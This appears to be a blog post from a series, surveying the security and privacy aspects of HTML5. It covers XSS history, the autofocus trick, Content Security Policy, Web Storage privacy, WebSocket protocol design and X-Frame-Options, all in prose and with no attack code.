(With the historical perspective behind us, we dive into HTML5. This series concludes on Wednesday.)

Security (and Privacy) From HTML5

Most HTML5 security checklists rehash the recommendations and warnings from the specs themselves. It’s always a good sign when specs acknowledge security and privacy. Getting to that point isn’t trivial. There were two detours on the way to HTML5. WAP was a first stab at putting the web on mobile devices when mobile devices were dumb. And one of its first failings was the lack of cookie support.

XHTML was another blip on the radar. Its only improvement over HTML seemed to be that mark-up could be parsed under a stricter XML interpreter so typos would be more easily caught. XHTML caught on as a cool thing to do, but most sites served it with a text/html MIME type that completely negated any difference from HTML in the first place. Herd mentality ruled the day on that one.

CSRF and clickjacking are called out as security concerns in the HTML5 spec. For some developers, that may have been the first time they heard about such vulns even though they’re fundamental to how the web works. They’re old, old vulns. The good news is that HTML5 has some design improvements that might relegate those vulns to history.

The <video> element doesn’t speak to security; it highlights the influence of non-technical concerns for a standard. The biggest drama around this element was the choosing whether an explicit codec should be mandated.

WebGL is an example of pushing beyond the browser into graphics cards. These hardware for these cards doesn’t care about Same Origin Policy or even security, for that matter. Early versions of the spec had two major problems: Denial of Service and Information Leakage. It was refreshing to see privacy (information leakage) receive such attention. As a consequence of these risks browsers pulled support. Early implementation allowed researchers to find these problems and improve WebGL. Part of its revision included attachment to another HTML5 security policy: Cross Origin Resource Sharing (CORS).

Like WebGL, the WebSocket API is another example where browsers implemented an early draft, revoked support due to security concerns, and now offer an improved version. For example, the WebSockets include a handshake and masking to prevent the kind of cross-protocol attacks that caused early web browsers to block access to ports like SMTP and telnet.

These examples show us a few things. One, we shouldn’t be surprised at the tensions from competing desires during the drafting process. Two, secure design takes time. (Remember PHP?) And three, browser developers are pushing the curve on security.

It’s only a matter of time before XSS rears its ugly head during a discussion of web security. After all, HTML injection has tormented developers from the beginning. Early examples of malicious HTML used LiveScript, the ancestral title to JavaScript. In 1995 Netscape offered a Bug Bounty for its browser. The winning exploit exposed a privacy hole and netted $1000. Interestingly, the runner up was a crypto timing attack that could, for example, reveal the secret key of an SSL server. Even if RSA has a secure design in terms of cryptographic primitives, vulns will appear in its implementation. That was merely a hint of the trouble to come for SSL/TLS.

Anyway, that was a nice $1000 bug in 1995. HTML injection continued to grow, with one of the first hacks demonstrated against a web-based email system in 1998. Behold, the mighty <img> tag using a javascript: URI to pop up a login prompt. That was just a few years after the term phishing had been coined.

So is there really an HTML5 injection? What terrible flaws does the new standard contain that its predecessors did not?

Not much. An important improvement from HTML5 is that parsing HTML documents is codified with instructions on order of operations, error handling, and fixup steps. A large portion of XSS history involves payloads that exploit browser quirks or bizarre parsing rules.

A key component to the infamous Samy worm’s success was Internet Explorer’s “fix up” of a javascript: token split by a newline character (i.e. java\nscript) to a single, valid URI. A unified approach to parsing HTML should minimize these kinds of problems, or at least make it easier to test for them. Last year a bug was found in Firefox’s parsing of HTML entities when a NULL byte (%00) was present. That was an implementation error; HTML5 actually provides instructions on how that entity should have been handled. The persistent danger will be a browser’s legacy support and non-standards (or relaxed standards) mode.

Sites that have weak deny listing will suffer the most from the arrival of HTML5. HTML5 has new elements and new attributes that provide JavaScript execution contexts. If your site relies on fancy regexes to strip out all the cool hacks from XSS cheat sheets you’ve been scouring, then it’s still likely to miss the new tags of HTML5.

The initial excitement around HTML5-based XSS was the autofocus attribute. A common reflection point for HTML injection is the value of an <input> element. Depending on the kind of payload injected, an exploit would require the victim to perform some action (submit the form, click a field, etc.). The autofocus attribute lets an exploit to automatically execute JavaScript tied to an onfocus or onblur event.

There’s a cynical perspective that HTML5 will bring a brief period of worse XSS problems by developers who embrace HTML5’s enhanced form validation while forgetting to apply server-side validation. There’s nothing misleading about HTML5’s approach to this. More pre-defined <input> types and client-side regexes improve the user experience. It’s not intended to be a security barrier. It’s a usability enhancement, especially for browsers on mobile devices.

HTML5 has distressingly few ways to minimize the impact of XSS attacks with <iframe> sandboxing and Cross Origin Resource Sharing controls. They help, but they don’t fundamentally change the design of the Same Origin Policy, which has the drawback that all content within an Origin receives equal treatment. Rather than providing a design of least privilege access, it’s a binary all or nothing privilege. That’s unappetizing for modern web apps that wish to implement everything from mashups to advertising to running third-party JavaScript within a trusted Origin.

The Content Security Policy (CSP) introduces design-level countermeasures for vulns like XSS. CSP moved from a Mozilla project to a standards track for all browsers to implement. A smart design choice is providing monitor and enforcement modes. It’s implementation will likely echo that of early web app firewalls. CSP complexity has the potential to break sites. Expect monitor mode to last for quite a while before sites start enforcing rules. The ability to switch between monitor and enforce is a sign of design that encourages adoption: Make it easier for devs to test policies over time.

HTML injection deserves emphasis since it’s the most pervasive problem for web apps. But it’s not the only problem for web apps. Other pieces of HTML5 have equally serious concerns.

The Web Storage API adds key-value storage to the browser. It’s effectively a client-side database. Avoid the immediate jump to SQL injection whenever you hear the word database. Instead, consider the privacy implications of Web Storage. We must be concerned about privacy extraction, not SQL injection. Web Storage has already been demonstrated as yet another tool for insinuating supercookies into the browser. In an era when developers still neglect to encrypt passwords in server-side databases, consider the mistakes awaiting data placed in browser databases: personal information, credit card numbers, password recovery, and more. And all of this just an XSS away from being exfiltrated. XSS isn’t the only threat. Malware has already demonstrated the inclination to scrape hard drives for financial data, credentials, keys, etc. An unencrypted store of 5MB (or more!) data is an appealing target. Woe to the web developer who thinks Web Storage is a convenient place to store a user’s password.

The WebSocket API entails a different kind of security. The easy observation is that it should use wss:// in favor of ws://, just like HTTPS should be everywhere. The subtler problem lies with the protocol layered over a WebSocket connection.

Security from controls like HTTPS, Same Origin, and session cookies don’t automatically transfer to WebSockets. For example, consider a simple chat protocol. Each message includes the usernames for sender and recipient. If the server just routes messages based on usernames without verifying the sender’s name matches the WebSocket they initiated, then it’d be trivial to spoof messages. Or consider if the app does verify the sender and recipient, but users’ session cookies are used to identify them. If the recipient receives a message packet that contains the sender’s session ID – well, I hope you see the insecurity there.

If there’s one victim of the HTML5 arms race, it’s the browser exploit. Not that they’ve disappeared, but that they’ve become more complex. A byproduct of keeping up with (relatively) quickly changing drafts is that modern browsers are quicker to update. More importantly, self-updating shares a of features like plugin sandboxing, process separation, and even rudimentary XSS protection. Whatever your choice of browser, the only version number you need any more is HTML5.

That’s the desire. In practice, accelerating browser updates isn’t going to adversely affect the pwn to own and exploit communities any time soon. IE6 refuses to disappear from the web. Qualys’ BrowserCheck stats show that browsers still tend to be out of date. But worse, the plugins remain out of date even if the browser is patched. In other words, Flash and Java deserve fingerpointing for being responsible for exposing security holes. When was the last time Adobe released a non-critical Flash update?

Browser security isn’t restricted to internal code. A header like X-Frame-Options offers an easy defense against clickjacking. New HTML5 capabilities like the sandbox attribute for iframes would defeat JavaScript-based frame busters intended to block clickjacking. With one fell swoop of security design (and adding a single header at your web server), it should be possible to get rid of an entire class of vulnerability. The catch is getting sites to implement it.

The browser needs the complicity of sites in order for a feature like X-Frame-Options to matter. It’s one thing to scrutinize the design of a half-dozen or so web browsers. It’s quite another to consider the design of millions and millions of web sites.

There is a looming XSS threat, but it’s a byproduct of the ecosystem building around HTML5. Heavy JavaScript libraries have become major components of modern web apps. JavaScript has a challenging environment for security. Its interaction with the DOM is restricted by Same Origin Policy. On the other hand, its prototype-based design and global namespaces.

JavaScript libraries are great. They reinforce good programming patterns and provide functionality that would otherwise have to be created from scratch. The flip side of libraries is that they offer additional exploit vectors and need to be maintained.

Let’s return to the idea of deny lists to discuss the other insidious aspect of XSS. These libraries also have functions that expose eval(), DOM manipulation, and XHR calls, among others. By no means is there anything insecure or inadvisable about this. All it does it magnify the impact if an XSS vuln already exists on the site – which isn’t likely to be from the JavaScript library.